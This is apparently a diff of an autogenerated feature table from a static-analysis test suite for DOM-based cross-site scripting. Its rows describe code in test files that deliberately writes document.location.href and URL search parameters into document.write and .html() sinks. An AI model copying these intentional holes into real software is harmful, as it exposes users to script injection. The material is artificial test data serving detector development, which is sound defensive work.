contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:51 | documen ... rCase() | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:51 | documen ... rCase() | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:51 | documen ... rCase() | receiverName | document | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:51 | exceptional return of documen ... rCase() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:51 | exceptional return of documen ... rCase() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:51 | exceptional return of documen ... rCase() | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:25:7:32 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:25:7:32 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:25:7:32 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:34:7:37 | href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:34:7:37 | href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:34:7:37 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:39:7:49 | toUpperCase | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:39:7:49 | toUpperCase | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:39:7:49 | toUpperCase | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:1:8:8 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:1:8:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:1:8:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:1:8:14 | document.write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:1:8:14 | document.write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:1:8:14 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:1:8:49 | documen ... Left()) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:1:8:49 | documen ... Left()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:1:8:49 | documen ... Left()) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:1:8:49 | exceptional return of documen ... Left()) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:1:8:49 | exceptional return of documen ... Left()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:1:8:49 | exceptional return of documen ... Left()) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:10:8:14 | write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:10:8:14 | write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:10:8:14 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:23 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:23 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:23 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:32 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:32 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:32 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:37 | documen ... on.href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:37 | documen ... on.href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:37 | documen ... on.href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:46 | documen ... rimLeft | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:46 | documen ... rimLeft | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:46 | documen ... rimLeft | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:48 | documen ... mLeft() | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:48 | documen ... mLeft() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:48 | documen ... mLeft() | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:48 | documen ... mLeft() | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:48 | documen ... mLeft() | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:48 | documen ... mLeft() | receiverName | document | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:48 | exceptional return of documen ... mLeft() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:48 | exceptional return of documen ... mLeft() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:16:8:48 | exceptional return of documen ... mLeft() | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:25:8:32 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:25:8:32 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:25:8:32 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:34:8:37 | href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:34:8:37 | href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:34:8:37 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:39:8:46 | trimLeft | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:39:8:46 | trimLeft | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:8:39:8:46 | trimLeft | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:1:9:8 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:1:9:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:1:9:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:1:9:14 | document.write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:1:9:14 | document.write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:1:9:14 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:1:9:59 | documen ... .href)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:1:9:59 | documen ... .href)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:1:9:59 | documen ... .href)) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:1:9:59 | exceptional return of documen ... .href)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:1:9:59 | exceptional return of documen ... .href)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:1:9:59 | exceptional return of documen ... .href)) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:10:9:14 | write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:10:9:14 | write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:10:9:14 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:21 | String | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:21 | String | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:21 | String | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:34 | String.fromCharCode | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:34 | String.fromCharCode | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:34 | String.fromCharCode | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:58 | String. ... n.href) | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:58 | String. ... n.href) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:58 | String. ... n.href) | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:58 | String. ... n.href) | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:58 | String. ... n.href) | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:58 | String. ... n.href) | receiverName | document | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:58 | exceptional return of String. ... n.href) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:58 | exceptional return of String. ... n.href) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:16:9:58 | exceptional return of String. ... n.href) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:23:9:34 | fromCharCode | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:23:9:34 | fromCharCode | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:23:9:34 | fromCharCode | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:36:9:43 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:36:9:43 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:36:9:43 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:36:9:52 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:36:9:52 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:36:9:52 | document.location | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:9:36:9:57 | documen ... on.href | CalleeFlexibleAccessPath | String.fromCharCode | | autogenerated/Xss/DomBasedXss/string-manipulations.js:9:36:9:57 | documen ... on.href | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:9:36:9:57 | documen ... on.href | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:9:36:9:57 | documen ... on.href | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:9:36:9:57 | documen ... on.href | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:9:36:9:57 | documen ... on.href | receiverName | String | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:45:9:52 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:45:9:52 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:45:9:52 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:54:9:57 | href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:54:9:57 | href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:9:54:9:57 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:1:10:8 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:1:10:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:1:10:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:1:10:14 | document.write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:1:10:14 | document.write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:1:10:14 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:1:10:46 | documen ... .href)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:1:10:46 | documen ... .href)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:1:10:46 | documen ... .href)) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:1:10:46 | exceptional return of documen ... .href)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:1:10:46 | exceptional return of documen ... .href)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:1:10:46 | exceptional return of documen ... .href)) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:10:10:14 | write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:10:10:14 | write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:10:10:14 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:16:10:21 | String | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:16:10:21 | String | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:16:10:21 | String | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:10:16:10:45 | String( ... n.href) | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/string-manipulations.js:10:16:10:45 | String( ... n.href) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:10:16:10:45 | String( ... n.href) | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:10:16:10:45 | String( ... n.href) | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:10:16:10:45 | String( ... n.href) | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:10:16:10:45 | String( ... n.href) | receiverName | document | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:16:10:45 | exceptional return of String( ... n.href) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:16:10:45 | exceptional return of String( ... n.href) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:16:10:45 | exceptional return of String( ... n.href) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:23:10:30 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:23:10:30 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:23:10:30 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:23:10:39 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:23:10:39 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:23:10:39 | document.location | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:10:23:10:44 | documen ... on.href | CalleeFlexibleAccessPath | String | | autogenerated/Xss/DomBasedXss/string-manipulations.js:10:23:10:44 | documen ... on.href | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:10:23:10:44 | documen ... on.href | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:10:23:10:44 | documen ... on.href | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:10:23:10:44 | documen ... on.href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:32:10:39 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:32:10:39 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:32:10:39 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:41:10:44 | href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:41:10:44 | href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:10:41:10:44 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:1:11:8 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:1:11:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:1:11:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:1:11:14 | document.write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:1:11:14 | document.write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:1:11:14 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:1:11:46 | documen ... .href)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:1:11:46 | documen ... .href)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:1:11:46 | documen ... .href)) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:1:11:46 | exceptional return of documen ... .href)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:1:11:46 | exceptional return of documen ... .href)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:1:11:46 | exceptional return of documen ... .href)) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:10:11:14 | write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:10:11:14 | write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:10:11:14 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:16:11:21 | escape | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:16:11:21 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:16:11:21 | escape | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:11:16:11:45 | escape( ... n.href) | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/string-manipulations.js:11:16:11:45 | escape( ... n.href) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:11:16:11:45 | escape( ... n.href) | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:11:16:11:45 | escape( ... n.href) | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:11:16:11:45 | escape( ... n.href) | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:11:16:11:45 | escape( ... n.href) | receiverName | document | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:16:11:45 | exceptional return of escape( ... n.href) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:16:11:45 | exceptional return of escape( ... n.href) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:16:11:45 | exceptional return of escape( ... n.href) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:23:11:30 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:23:11:30 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:23:11:30 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:23:11:39 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:23:11:39 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:23:11:39 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:32:11:39 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:32:11:39 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:32:11:39 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:41:11:44 | href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:41:11:44 | href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:11:41:11:44 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:1:12:8 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:1:12:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:1:12:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:1:12:14 | document.write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:1:12:14 | document.write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:1:12:14 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:1:12:62 | documen ... ref)))) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:1:12:62 | documen ... ref)))) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:1:12:62 | documen ... ref)))) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:1:12:62 | exceptional return of documen ... ref)))) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:1:12:62 | exceptional return of documen ... ref)))) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:1:12:62 | exceptional return of documen ... ref)))) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:10:12:14 | write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:10:12:14 | write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:10:12:14 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:16:12:21 | escape | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:16:12:21 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:16:12:21 | escape | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:12:16:12:61 | escape( ... href))) | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/string-manipulations.js:12:16:12:61 | escape( ... href))) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:12:16:12:61 | escape( ... href))) | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:12:16:12:61 | escape( ... href))) | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:12:16:12:61 | escape( ... href))) | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:12:16:12:61 | escape( ... href))) | receiverName | document | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:16:12:61 | exceptional return of escape( ... href))) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:16:12:61 | exceptional return of escape( ... href))) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:16:12:61 | exceptional return of escape( ... href))) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:23:12:28 | escape | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:23:12:28 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:23:12:28 | escape | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:23:12:60 | exceptional return of escape( ... .href)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:23:12:60 | exceptional return of escape( ... .href)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:23:12:60 | exceptional return of escape( ... .href)) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:30:12:35 | escape | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:30:12:35 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:30:12:35 | escape | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:30:12:59 | exceptional return of escape( ... n.href) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:30:12:59 | exceptional return of escape( ... n.href) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:30:12:59 | exceptional return of escape( ... n.href) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:37:12:44 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:37:12:44 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:37:12:44 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:37:12:53 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:37:12:53 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:37:12:53 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:46:12:53 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:46:12:53 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:46:12:53 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:55:12:58 | href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:55:12:58 | href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:12:55:12:58 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:1:1:12:2 | (functi ... )]);\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:1:1:12:2 | (functi ... )]);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:1:1:12:2 | (functi ... )]);\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:1:1:12:4 | (functi ... );\\n})() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:1:1:12:4 | (functi ... );\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:1:1:12:4 | (functi ... );\\n})() | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:1:1:12:4 | exceptional return of (functi ... );\\n})() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:1:1:12:4 | exceptional return of (functi ... );\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:1:1:12:4 | exceptional return of (functi ... );\\n})() | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:1:1 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:1:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:1:1 | this | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:1:1 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:1:1 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | 'arguments' object of anonymous function | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ 